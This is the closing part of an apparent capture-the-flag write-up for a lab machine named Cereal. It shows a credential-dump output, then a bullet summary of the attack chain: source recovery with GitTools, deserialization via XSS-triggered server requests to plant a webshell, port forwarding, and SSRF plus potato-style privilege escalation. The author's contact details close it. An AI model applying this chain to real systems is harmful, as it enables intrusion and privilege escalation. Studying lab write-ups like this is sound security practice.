Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : CEREAL$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 1/15/2021 12:17:28 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : CEREAL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : cereal$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

Summary of knowledge

  • use GitTools to get the source code
  • DownloadManager object deserialization
  • use XSS to issue server-side requests and trigger the deserialization to download a webshell
  • port forwarding with portfwd
  • combine the GraphQL SSRF with SeImpersonatePrivilege (juicy potato over HTTP using GenericPotato) for privilege escalation

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…